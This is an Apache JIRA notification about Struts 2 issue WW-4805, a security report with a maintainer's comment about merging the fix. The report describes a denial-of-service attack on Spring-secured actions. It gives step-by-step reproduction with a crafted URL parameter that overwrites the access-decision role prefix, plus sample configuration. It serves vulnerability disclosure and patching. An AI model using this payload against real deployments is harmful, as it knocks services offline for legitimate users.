[ 
https://issues.apache.org/jira/browse/WW-4805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16053541#comment-16053541
 ] 

ASF GitHub Bot commented on WW-4805:
------------------------------------

Github user lukaszlenart commented on the issue:

    https://github.com/apache/struts/pull/142
  
    If no objections I am going to merge this PR, btw. I have created a task to 
implement Voters
    https://issues.apache.org/jira/browse/WW-4807


> At least a DoS attack is available for Spring secured actions
> -------------------------------------------------------------
>
>                 Key: WW-4805
>                 URL: https://issues.apache.org/jira/browse/WW-4805
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core, Plugin - Spring
>    Affects Versions: 2.3.32, 2.5.10
>            Reporter: Yasser Zamani
>              Labels: github-import, patch, security
>             Fix For: 2.3.33, 2.5.next
>
>
> This is a DoS attack example when Struts2 user uses Spring to secure his 
> actions, like mentioned at section `Initializing Actions from Spring` of 
> [spring-plugin|https://struts.apache.org/docs/spring-plugin.html]
> Attack Steps:
> # An anonymous user logins as an authenticated user.
> # Then tries
> {noformat}
> http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
> {noformat}
>  where {action0-actionN} are actions available for users
> Attack Impacts:
> By replacing `rolePrefix`, attacker blocks access to secured actions for all 
> defined roles even if they authenticate via login! so services are down and 
> webapp restart is required to back to normal!!!
> Configuration Example:
> * spring-security.xml
> {code:xml}
>     <global-method-security secured-annotations="enabled" proxy-target-class 
> = "true" />
>     <http auto-config="true" use-expressions="false">
>         <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
>     </http>
>     <authentication-manager erase-credentials="false">
>         <authentication-provider>
>             <user-service>
>                 <user name="admin" password="admin" authorities="ROLE_ADMIN" 
> />
>                 <user name="user" password="user" authorities="ROLE_USER" />
>             </user-service>
>         </authentication-provider>
>     </authentication-manager>
> {code}
> * applicationContext.xml
> {code:xml}
> <bean id="secureAction" 
> class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
> {code}
> * struts.xml
> {code:xml}
>         <action name="admin" class="secureAction" method="admin">
>             <result name="success" type="json" />
>         </action>
>         <action name="user" class="secureAction" method="user">
>             <result name="success" type="json" />
>         </action>
> {code}
> * SecureAction.java
> {code:java}
> package me.zamani.yasser.ww_convention.actions;
> import org.springframework.security.access.annotation.Secured;
> public class SecureAction {
>     @Secured({"ROLE_ADMIN"})
>     public String admin() {
>         return "success";
>     }
>     @Secured({"ROLE_USER"})
>     public String user() {
>         return "success";
>     }
> }
> {code}
> * login via 
> {noformat}
> http://{ip}:{port}/login
> {noformat}
>  as user.
> * open 
> {noformat}
> http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
> {noformat}
> * in another browser, login via 
> {noformat}
> http://{ip}:{port}/login
> {noformat}
>  as admin.
> * try to access 
> {noformat}
> http://{ip}:{port}/admin
> {noformat}
>  which fails!
> * also repeat 5 and try open
> {noformat}
>  http://{ip}:{port}/user
> {noformat}
>  which also fails!
> * Services are down and webapp restart is required to back to normal.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)

Reply via email to